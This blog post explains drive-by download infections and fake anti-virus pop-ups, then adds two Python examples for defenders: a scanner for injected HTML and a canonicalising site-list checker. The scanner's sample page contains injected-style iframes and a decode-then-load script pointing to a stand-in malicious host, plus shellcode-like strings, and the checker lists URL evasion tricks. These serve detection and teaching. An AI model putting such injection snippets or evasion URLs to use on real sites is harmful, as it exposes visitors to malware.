Malware Infection Methods: Drive-by Downloads

Posted on March 25th, 2010 by Benjamin Harbin

Now that the Internet has been around for some time, users have become more adept at protecting themselves from Web-based threats.  They have learned that certain parts of the Web, such as advertisements, can pose a security risk and therefore avoid clicking on them.  Unfortunately, malware writers have noticed the same trend and continue to come up with new ways of distributing their malicious applications.  The most popular method over the past year has been the Drive-by Download: the user becomes infected simply by visiting a compromised Web page and is completely unaware of the malicious file download occurring in the background.  Exploits against Web browsers (Internet Explorer, Firefox, Safari, etc.) and against the third-party applications a browser hands content to (Adobe Reader, Microsoft Excel, etc.) can allow remote code execution, and that code then fetches a malicious payload invisibly to the user.  Fake pop-ups that look legitimate, often cleverly masquerading as anti-virus alerts, are a related and popular method of tricking the user into either clicking the pop-up to close it or following its instructions, both of which result in a malicious file download.  Strictly speaking these need the user to act, but they are delivered the same way: by code injected into a page the user already trusts.

Browser and third-party application exploits are quite similar: an inherent flaw in the browser or application gives the malware writer the ability to execute code on the unsuspecting user's machine.  What that code does varies with the exploit package initially downloaded.  Most exploit code installs a dropper of some sort, a small first-stage program whose only job is to fetch and install further malicious applications over time.  Other files downloaded this way can record the user's keystrokes, enabling the theft of passwords and online banking credentials, or install software that adds the user's PC to a larger herd of bots used for spamming or other malicious deeds.

Fake anti-virus pop-up alerts have also become a very popular infection method.  Malware writers inject code into a Web page that pops up a legitimate-looking alert notifying the user of a virus infection.  Users are often fooled by the bogus alert and infect themselves by accepting the download and installing the fake anti-virus software.  Once installed, the fake anti-virus product can download and install other types of malware, ranging from Trojans to ransomware.
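Both of the injection patterns described above leave traces in the page source that an administrator can look for: the exploit-kit redirect usually arrives as an iframe that is sized to zero or hidden by style and points at a host that is not the site's own, and the fake-alert or loader script is usually delivered as an inline script that decodes itself with unescape() before running.  The scanner below is an added example, not code from the original post; it uses a constructed sample page and assumes the site's legitimate hostname is www.example.com.  The heuristics are indicators, not proof, so a hit means "look at this element", not "this site is compromised".

```python
"""Flag HTML elements typical of drive-by injection: hidden or off-site
iframes and inline scripts that decode themselves before running.

Added example, not from the original post. Heuristics only: a hidden iframe
or an eval/unescape chain is not proof of compromise, but on a page that has
no business containing either, each hit deserves a look.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the host the page legitimately belongs to. Script and iframe
# sources on any other host are reported as off-site.
SITE_HOST = "www.example.com"

HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)
OBFUSCATION = re.compile(
    r"(?:eval|document\.write)\s*\(\s*unescape\s*\("   # decode-then-run chain
    r"|(?:%u[0-9a-f]{4}){4,}"                           # runs of %uXXXX (shellcode style)
    r"|(?:\\x[0-9a-f]{2}){8,}",                         # runs of \xNN
    re.I)


def _tiny(value):
    """True for width/height attribute values such as '0', '1' or '0px'."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


class DriveByScanner(HTMLParser):
    """Collects (tag, src, reasons) for elements that look injected."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_inline_script = False
        self._script_buf = []

    def _offsite(self, url):
        host = urlparse(url).hostname
        return host is not None and host.lower() != self.site_host

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        if tag == "iframe":
            if _tiny(a.get("width")) and _tiny(a.get("height")):
                reasons.append("zero-size iframe")
            if HIDDEN_STYLE.search(a.get("style", "")):
                reasons.append("hidden by style")
            if self._offsite(a.get("src", "")):
                reasons.append("off-site src")
        elif tag == "script":
            if "src" in a:
                if self._offsite(a["src"]):
                    reasons.append("off-site script")
            else:
                self._in_inline_script = True   # body arrives via handle_data
        if reasons:
            self.findings.append((tag, a.get("src", ""), reasons))

    def handle_data(self, data):
        if self._in_inline_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline_script:
            body = "".join(self._script_buf)
            if OBFUSCATION.search(body):
                self.findings.append(("script", "(inline)", ["obfuscated inline script"]))
            self._in_inline_script = False
            self._script_buf = []


def scan_html(html, site_host=SITE_HOST):
    """Return the list of suspicious (tag, src, reasons) found in html."""
    parser = DriveByScanner(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: a normal site with four injected elements.
SAMPLE_PAGE = """<html><body>
<h1>Welcome to our site</h1>
<script src="/js/site.js"></script>
<script src="http://www.example.com/js/analytics.js"></script>
<iframe src="http://bad.example.net/in.php" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://bad.example.net/ld.php" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//bad.example.net/x.js%22%3E%3C/script%3E'));</script>
<script>var s = "%u9090%u9090%u4141%u4141%u4242";</script>
</body></html>"""

if __name__ == "__main__":
    for tag, src, reasons in scan_html(SAMPLE_PAGE):
        print(f"{tag:7} {src or '-':45} {', '.join(reasons)}")
```

Run against a saved copy of a page (or the output of a crawl of your own site), the script lists each suspect element with the reasons it was flagged.  A real site will have legitimate off-site scripts (analytics, ad networks), so the off-site check is most useful as a diff against a known-good crawl rather than on its own.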

So how does one protect a network from Drive-by Downloads?  Unfortunately, there is no bullet-proof solution: 0-day exploits (exploits so new that no patch is yet available) will always be a threat in the third-party software we use daily, and keeping browsers and their plug-ins patched only closes the holes that are already known.  One can, however, reduce the exposure by practicing safe browsing habits and educating other users about Drive-by Downloads and other infection methods.  Many newer browser versions include a "phishing filter" (Internet Explorer's SmartScreen Filter, or the Safe Browsing list used by Firefox and Chrome) that warns users before a known dangerous site is loaded.  This filter is only as good as the constant updates to its dangerous-site list, so it cannot know about a site that was compromised an hour ago, but it is still recommended as a first line of defense.  Pop-up blockers should always remain on, and pop-ups should be allowed only after user intervention; while users might still allow a malicious pop-up by accident, this prevents pop-ups from opening automatically.  More technical users or administrators can also disable active content, such as JavaScript or ActiveX controls, through policy (Internet Explorer security zones managed through Group Policy, or the NoScript extension in Firefox).  Since this breaks legitimate sites, a whitelist of the necessary sites can be maintained to allow scripting on them alone.
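Both list-based controls above, the dangerous-site list and the scripting whitelist, fail in the same way if the lookup is naive: the attacker puts the listed name in the wrong place in the URL (as userinfo before an "@", as a parent of a look-alike domain, or with a trailing dot or odd capitalisation) and a string comparison misses it.  The checker below is an added example and not part of the original post; the two lists are constructed for illustration, and a real filter would refresh the dangerous-site list from a vendor feed.  It canonicalises the host before comparing and matches by domain suffix, so a subdomain of a listed host is treated like the host itself.

```python
"""Site-list checks done on the canonical hostname rather than the raw URL.

Added example (not from the original post). The two lists below are
constructed for illustration; a real phishing filter pulls its dangerous-site
list from a constantly refreshed feed.
"""
from urllib.parse import urlsplit

DANGEROUS_SITES = {"bad.example.net", "fakeav.example.org"}        # assumption
ALLOWED_SCRIPT_SITES = {"www.example.com", "intranet.example.com"}  # assumption


def canonical_host(url):
    """Lowercase hostname with userinfo, port and trailing dot stripped.

    urlsplit().hostname already drops 'user@' and ':port' and lowercases;
    the trailing dot (fully qualified form) is removed here so that
    'bad.example.net.' and 'bad.example.net' compare equal.
    """
    if "://" not in url:            # bare 'host/path' as a user might type it
        url = "http://" + url
    host = urlsplit(url).hostname or ""
    return host.rstrip(".").lower()


def host_matches(host, domains):
    """True if host equals, or is a subdomain of, any domain in the set."""
    labels = host.split(".")
    return any(".".join(labels[i:]) in domains for i in range(len(labels)))


def is_dangerous(url):
    """Phishing-filter style check against the dangerous-site list."""
    return host_matches(canonical_host(url), DANGEROUS_SITES)


def allow_active_content(url):
    """Policy check: run scripts/ActiveX only on whitelisted sites."""
    return host_matches(canonical_host(url), ALLOWED_SCRIPT_SITES)


if __name__ == "__main__":
    for u in ("http://www.example.com/",
              "http://www.example.com@BAD.example.net./in.php",
              "http://cdn.bad.example.net:8080/x.js",
              "http://www.example.com.evil.test/login"):
        print(f"{u:55} dangerous={is_dangerous(u)!s:5} scripts={allow_active_content(u)}")
```

The last URL in the usage block shows why suffix matching is done from the right: "www.example.com.evil.test" begins with a whitelisted name but is not under it, and the check correctly refuses it.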
